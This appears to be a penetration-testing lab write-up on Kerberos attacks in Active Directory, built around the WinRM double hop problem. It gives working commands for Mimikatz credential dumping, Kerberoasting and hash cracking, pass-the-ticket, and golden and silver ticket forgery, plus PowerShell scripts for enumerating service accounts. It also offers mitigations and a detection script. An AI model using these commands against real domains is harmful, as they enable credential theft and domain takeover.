Kerberos Attack Methods with Double Hop Workarounds

Kerberos Overview

Kerberos is the default network authentication protocol in Active Directory. Instead of sending a password to each service, a client holds tickets issued by the Key Distribution Center (KDC) on the domain controller: the Authentication Service issues a Ticket Granting Ticket (TGT) once the client proves knowledge of its password-derived key, and the client then presents that TGT to the Ticket Granting Service (TGS) to obtain a service ticket for each resource, identified by its Service Principal Name (SPN). The username mrci0x1 is used throughout where applicable.

Why Target Kerberos? Tickets are bearer tokens: whoever holds one can impersonate the user to the service it names, and misconfigured environments (weak service-account passwords, SPNs on privileged accounts, RC4 still enabled, unconstrained delegation) let an attacker obtain, crack or forge them.

Double Hop Issue

The double hop problem occurs when you authenticate to a server with a service ticket (first hop), but the logon session the server creates for you holds neither your TGT nor your password. The server therefore cannot request a service ticket to a second resource on your behalf, so any access from that server to another host (second hop) fails unless Kerberos delegation is configured or credentials are supplied explicitly.

Example Scenario:

  • Attack Host: Non-domain-joined system (e.g., Parrot Linux).

  • DEV01: Server where mrci0x1 has Remote Management Users group privileges.

  • DC01: Domain controller.

  • Issue: From inside the WinRM session on DEV01, any authenticated access to DC01 (an LDAP query with PowerView, an SMB share, a nested WinRM session) fails because the session on DEV01 has no TGT to request the second service ticket with.

Demonstration with Mimikatz:

PS C:\> Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\mrci0x1
[DEV01]: PS C:\Users\mrci0x1\Documents> cd 'C:\Users\Public\'
[DEV01]: PS C:\Users\Public> .\mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1284107
User Name         : mrci0x1
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 6/30/2025 5:08:00 AM
SID               : S-1-5-21-1666128402-2659679066-1433032234-1107
    msv :
     * Username : mrci0x1
     * Domain   : INLANEFREIGHT
     * NTLM     : cf3a5525ee9414229e66279623ed5c58
     * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
    kerberos :
     * Username : mrci0x1
     * Domain   : INLANEFREIGHT.LOCAL
     * Password : (null)

Observation: the kerberos provider holds no password and no TGT for this logon session (only the msv NTLM hash is present), so DEV01 cannot obtain service tickets on our behalf; klist inside the session likewise shows no krbtgt ticket.
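The same failure reproduced without Mimikatz, as an added example that is not part of the original page: it runs from a Windows attack host that can reach DEV01 over WinRM, prints the ticket cache of the first-hop logon session, then attempts two second hops to DC01. The host names follow the page's scenario; the SYSVOL share and the base DN DC=INLANEFREIGHT,DC=LOCAL are assumptions.

```powershell
# Added example, not from the original page. Assumes a Windows attack host with WinRM access to DEV01
# and name resolution for DC01.INLANEFREIGHT.LOCAL; SYSVOL and the base DN are assumed.
$Cred = Get-Credential -UserName 'INLANEFREIGHT\mrci0x1' -Message 'First hop credentials'

Invoke-Command -ComputerName DEV01 -Credential $Cred -ScriptBlock {
    # First hop succeeded: this block runs on DEV01 under a network logon for mrci0x1.
    # That logon session holds no TGT, so DEV01 cannot ask the KDC for further service tickets for us.
    "[$env:COMPUTERNAME] ticket cache of this logon session (no krbtgt/ entry expected):"
    klist

    # Second hop over SMB: would need a cifs/DC01 service ticket that DEV01 cannot obtain.
    try {
        $null = Get-ChildItem -Path '\\DC01.INLANEFREIGHT.LOCAL\SYSVOL' -ErrorAction Stop
        'SMB second hop: succeeded (no double hop problem on this host)'
    } catch {
        "SMB second hop: failed - $($_.Exception.Message)"
    }

    # Second hop over LDAP with the session's implicit identity: same failure, different protocol.
    try {
        $root     = New-Object System.DirectoryServices.DirectoryEntry('LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL')
        $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, '(servicePrincipalName=*)')
        $null     = $searcher.FindOne()
        'LDAP second hop: succeeded (no double hop problem on this host)'
    } catch {
        "LDAP second hop: failed - $($_.Exception.Message)"
    }
}
```

Both second hops use the session's own identity on purpose; the workarounds below fix exactly these two calls by supplying credentials explicitly.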

Enumeration

mrci0x1@htb[/htb]# nmap -p88,389 10.129.201.127
PORT    STATE SERVICE
88/tcp  open  kerberos-sec
389/tcp open  ldap
mrci0x1@htb[/htb]# enum4linux -a 10.129.201.127

Attacks

  • Kerberoasting (request service tickets for accounts that have SPNs, then crack the TGS-REP offline):

mrci0x1@htb[/htb]# impacket-GetUserSPNs -dc-ip 10.129.201.127 INLANEFREIGHT.LOCAL/mrci0x1:password -request -outputfile ticket.hash
ServicePrincipalName: MSSQLSvc/sqlserver.inlanefreight.local:1433
Ticket: [TGS ticket data, written to ticket.hash as a $krb5tgs$<etype>$... line]

Crack with Hashcat. Mode 13100 is for RC4 tickets ($krb5tgs$23$); AES tickets need 19600 (etype 17) or 19700 (etype 18):

mrci0x1@htb[/htb]# hashcat -m 13100 ticket.hash passwords.txt

  • Pass-the-Ticket (PtT), on a Windows host, with a .kirbi exported earlier (e.g. via sekurlsa::tickets /export):

PS C:\> .\mimikatz.exe "kerberos::ptt ticket.kirbi" exit
PS C:\> klist

  • Golden Ticket (forged TGT; needs the krbtgt NTLM hash and the domain SID) and Silver Ticket (forged service ticket; needs only the service account's NTLM hash, so it never touches the KDC):

PS C:\> .\mimikatz.exe "kerberos::golden /user:mrci0x1 /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-1666128402-2659679066-1433032234 /krbtgt:krbtgt_hash /ptt" exit
PS C:\> .\mimikatz.exe "kerberos::golden /user:mrci0x1 /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-1666128402-2659679066-1433032234 /target:sqlserver.inlanefreight.local /service:MSSQLSvc /rc4:service_account_hash /ptt" exit
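A Kerberoast output file often mixes encryption types, and hashcat rejects a file whose lines do not match the mode. The following added example (not from the original page) splits ticket.hash by etype and prints the hashcat command for each part. The file names ticket.hash and passwords.txt follow the page; the three hash lines it writes are constructed and truncated, not real tickets.

```powershell
# Added example, not from the original page. Splits a Kerberoast output file by etype and maps each
# part to its hashcat mode. The sample hash lines below are constructed and truncated.
$HashcatModeByEtype = @{
    '23' = 13100   # RC4-HMAC        ($krb5tgs$23$...)
    '17' = 19600   # AES128-CTS-HMAC ($krb5tgs$17$...)
    '18' = 19700   # AES256-CTS-HMAC ($krb5tgs$18$...)
}

function Split-KerberoastHashes {
    param([Parameter(Mandatory)][string]$Path, [string]$Wordlist = 'passwords.txt')
    $buckets = @{}
    foreach ($line in Get-Content -Path $Path) {
        # Every TGS-REP hash starts with $krb5tgs$<etype>$; anything else is not a Kerberoast hash
        if ($line -match '^\$krb5tgs\$(\d+)\$') {
            $etype = $Matches[1]
            if (-not $buckets.ContainsKey($etype)) { $buckets[$etype] = @() }
            $buckets[$etype] += $line
        }
    }
    foreach ($etype in $buckets.Keys) {
        $outFile = "$Path.etype$etype"          # e.g. ticket.hash.etype23
        Set-Content -Path $outFile -Value $buckets[$etype]
        $mode = $HashcatModeByEtype[$etype]
        if ($mode) {
            "etype $etype: $($buckets[$etype].Count) hash(es) -> hashcat -m $mode $outFile $Wordlist"
        } else {
            "etype $etype: $($buckets[$etype].Count) hash(es) with no known hashcat mode, skipped"
        }
    }
}

# Constructed input: two RC4 tickets and one AES256 ticket in the layout GetUserSPNs -outputfile uses
@(
    '$krb5tgs$23$*sqlsvc$INLANEFREIGHT.LOCAL$MSSQLSvc/sqlserver.inlanefreight.local:1433*$1a2b3c4d...$aabbccdd...',
    '$krb5tgs$23$*iissvc$INLANEFREIGHT.LOCAL$HTTP/web.inlanefreight.local*$5e6f7a8b...$eeff0011...',
    '$krb5tgs$18$backupsvc$INLANEFREIGHT.LOCAL$*cifs/backup.inlanefreight.local*$9c0d1e2f...$22334455...'
) | Set-Content -Path 'ticket.hash'

Split-KerberoastHashes -Path 'ticket.hash'
```

An AES-only service account (etype 18) is not a dead end, it is simply a much slower crack; the split makes sure those lines are not silently dropped when the RC4 file is fed to mode 13100.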

Double Hop Workarounds

1. PSCredential Object

Description: Build a PSCredential object inside the first-hop session and pass it explicitly to cmdlets that accept -Credential. The remote host then authenticates to the second hop with that username and password instead of with its ticket-less logon session, so no TGT needs to be cached.

*Evil-WinRM* PS C:\Users\mrci0x1\Documents> $SecPassword = ConvertTo-SecureString 'lucky7' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\mrci0x1\Documents> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\mrci0x1', $SecPassword)
*Evil-WinRM* PS C:\Users\mrci0x1\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\mrci0x1\Documents> Get-DomainUser -SPN -Credential $Cred | Select samaccountname

Why Use It? It needs no admin rights and no configuration change on DEV01, so it works from a plain evil-winrm shell or a Linux attack host. The trade-off is that the plaintext password is typed into the session and ends up in PowerShell history and any transcript.
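The same workaround generalised beyond PowerView, as an added example that is not from the original page: it reuses the page's credential object to perform both an LDAP query (the Kerberoastable-account search PowerView's Get-DomainUser -SPN does) and an SMB share listing against DC01 from inside the first-hop session. The password 'lucky7' and the host names follow the page; the SYSVOL share, base DN and LDAP filter are assumptions.

```powershell
# Added example, not from the original page. Paste into the first-hop session on DEV01 (evil-winrm or
# Enter-PSSession). Password and host names follow the page; SYSVOL, the base DN and the filter are assumed.
$SecPassword = ConvertTo-SecureString 'lucky7' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\mrci0x1', $SecPassword)

function Get-KerberoastableAccount {
    # LDAP second hop with explicit credentials: DirectoryEntry binds with the supplied username and
    # password, so DEV01 authenticates to DC01 afresh instead of needing a cached TGT.
    param(
        [Parameter(Mandatory)][pscredential]$Credential,
        [string]$Dc     = 'DC01.INLANEFREIGHT.LOCAL',
        [string]$BaseDn = 'DC=INLANEFREIGHT,DC=LOCAL'
    )
    $root = New-Object System.DirectoryServices.DirectoryEntry(
        "LDAP://$Dc/$BaseDn",
        $Credential.UserName,
        $Credential.GetNetworkCredential().Password)

    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    # user accounts with an SPN, minus krbtgt (its ticket is not Kerberoastable in any useful way)
    $searcher.Filter   = '(&(objectCategory=user)(servicePrincipalName=*)(!(samAccountName=krbtgt)))'
    $searcher.PageSize = 500
    $null = $searcher.PropertiesToLoad.AddRange(@('samaccountname', 'serviceprincipalname'))

    foreach ($result in $searcher.FindAll()) {
        [pscustomobject]@{
            SamAccountName = [string]$result.Properties['samaccountname'][0]
            SPNs           = @($result.Properties['serviceprincipalname']) -join ', '
        }
    }
}

function Test-SecondHopShare {
    # SMB second hop with explicit credentials: map the share with -Credential rather than relying on
    # the session's identity; returns the number of top-level entries as a simple success signal.
    param(
        [Parameter(Mandatory)][pscredential]$Credential,
        [string]$Path = '\\DC01.INLANEFREIGHT.LOCAL\SYSVOL'
    )
    $drive = New-PSDrive -Name SecondHop -PSProvider FileSystem -Root $Path -Credential $Credential -ErrorAction Stop
    try     { (Get-ChildItem -Path "$($drive.Name):\" | Measure-Object).Count }
    finally { Remove-PSDrive -Name SecondHop }
}

Get-KerberoastableAccount -Credential $Cred | Format-Table -AutoSize
Test-SecondHopShare -Credential $Cred
```

Any cmdlet or .NET API that takes credentials works the same way (Invoke-Command -Credential for a nested WinRM hop, Get-ADUser -Credential where the RSAT module is present); the pattern is always to let the second hop do its own logon with the password rather than expecting DEV01 to delegate a ticket it never received.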

2. PSSession Configuration

Description: Register a session configuration on DEV01 that runs under explicit RunAs credentials. A session started with that configuration gets a logon with a cached TGT, so the double hop disappears for every command in the session, without typing the password into each cmdlet.

[DEV01]: PS C:\Users\mrci0x1\Documents> Register-PSSessionConfiguration -Name mrci0x1sess -RunAsCredential INLANEFREIGHT\mrci0x1
[DEV01]: PS C:\Users\mrci0x1\Documents> Restart-Service WinRM
PS C:\> Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\mrci0x1 -ConfigurationName mrci0x1sess
[DEV01]: PS C:\Users\mrci0x1\Documents> klist

Restarting WinRM drops the current session; reconnect with -ConfigurationName, after which klist shows a cached krbtgt ticket and PowerView queries against DC01 work without -Credential.

Limitations: the configuration must be registered on DEV01 itself from an elevated PowerShell (local administrator there, which Remote Management Users membership alone does not grant), and -RunAsCredential with a bare username opens an interactive credential prompt, so this cannot be done from an evil-winrm shell or from PowerShell on a Linux attack host.

Mitigation

  • Enforce long, random passwords (25+ characters) for service accounts, or move them to group Managed Service Accounts, so a Kerberoasted ticket does not crack.

  • Register SPNs only on accounts that need them, and never on privileged user accounts; an SPN on a Domain Admin is a Kerberoasting target with full-domain impact.

  • Monitor domain controller Security logs: a burst of Event ID 4769 from one account for many different service accounts, especially with TicketEncryptionType 0x17 (RC4), is the signature of Kerberoasting.

  • Disable unconstrained delegation; where a server genuinely needs to act for users on a second hop, use constrained or resource-based constrained delegation instead of Trusted for Delegation.

  • Enforce AES Kerberos encryption types (msDS-SupportedEncryptionTypes) and disable RC4, so that any ticket an attacker does obtain is far slower to crack.

  • Patch systems, domain controllers first.
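Detection logic for the "monitor KDC logs" item, as an added example that is not part of the original page: it runs over Event ID 4769 (service ticket requested) records and flags a requester that obtained RC4 service tickets for several distinct service accounts within a short window. The records are constructed inline; in production the same fields come from the domain controllers' Security log via Get-WinEvent. Thresholds and field mapping are assumptions to tune per environment.

```powershell
# Added example, not from the original page. Kerberoasting detection over Event ID 4769 records.
# The records below are constructed. In production map the output of
#   Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 }
# to the same fields (TargetUserName, ServiceName, TicketEncryptionType, Status, Time).
$SampleEvents = @(
    # mrci0x1 requests RC4 tickets for four different service accounts within seconds: Kerberoasting
    [pscustomobject]@{ Time = [datetime]'2025-06-30 05:10:01'; TargetUserName = 'mrci0x1@INLANEFREIGHT.LOCAL'; ServiceName = 'sqlsvc';    TicketEncryptionType = '0x17'; Status = '0x0' },
    [pscustomobject]@{ Time = [datetime]'2025-06-30 05:10:02'; TargetUserName = 'mrci0x1@INLANEFREIGHT.LOCAL'; ServiceName = 'iissvc';    TicketEncryptionType = '0x17'; Status = '0x0' },
    [pscustomobject]@{ Time = [datetime]'2025-06-30 05:10:02'; TargetUserName = 'mrci0x1@INLANEFREIGHT.LOCAL'; ServiceName = 'backupsvc'; TicketEncryptionType = '0x17'; Status = '0x0' },
    [pscustomobject]@{ Time = [datetime]'2025-06-30 05:10:03'; TargetUserName = 'mrci0x1@INLANEFREIGHT.LOCAL'; ServiceName = 'svc_ldap';  TicketEncryptionType = '0x17'; Status = '0x0' },
    # normal traffic: an AES ticket for a computer account and a single AES ticket for one service
    [pscustomobject]@{ Time = [datetime]'2025-06-30 05:10:05'; TargetUserName = 'jdoe@INLANEFREIGHT.LOCAL';    ServiceName = 'DEV01$';    TicketEncryptionType = '0x12'; Status = '0x0' },
    [pscustomobject]@{ Time = [datetime]'2025-06-30 05:11:00'; TargetUserName = 'jdoe@INLANEFREIGHT.LOCAL';    ServiceName = 'sqlsvc';    TicketEncryptionType = '0x12'; Status = '0x0' }
)

function Find-KerberoastingActivity {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [int]$MinDistinctServices = 3,   # distinct service accounts per requester before alerting
        [int]$WindowMinutes = 5          # ...requested within this span
    )
    # Only successful RC4 (0x17) requests for user-style service accounts matter here: computer
    # accounts (trailing $) and krbtgt are routine and would only add noise.
    $suspect = $Events | Where-Object {
        $_.Status -eq '0x0' -and
        $_.TicketEncryptionType -eq '0x17' -and
        $_.ServiceName -notlike '*$' -and
        $_.ServiceName -ne 'krbtgt'
    }

    foreach ($group in ($suspect | Group-Object TargetUserName)) {
        $sorted   = @($group.Group | Sort-Object Time)
        $services = @($sorted.ServiceName | Sort-Object -Unique)
        $minutes  = ($sorted[-1].Time - $sorted[0].Time).TotalMinutes
        if ($services.Count -ge $MinDistinctServices -and $minutes -le $WindowMinutes) {
            [pscustomobject]@{
                Requester        = $group.Name
                DistinctServices = $services.Count
                SpanMinutes      = [math]::Round($minutes, 2)
                Services         = $services -join ', '
            }
        }
    }
}

# With the constructed input only mrci0x1 is reported (4 services in 2 seconds); jdoe is not.
Find-KerberoastingActivity -Events $SampleEvents | Format-List
```

The RC4 filter is what gives this rule its precision: once the environment is AES-only, any 0x17 request is by itself worth a look, and the distinct-service count then separates a tool like GetUserSPNs -request from an application that legitimately uses one service.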
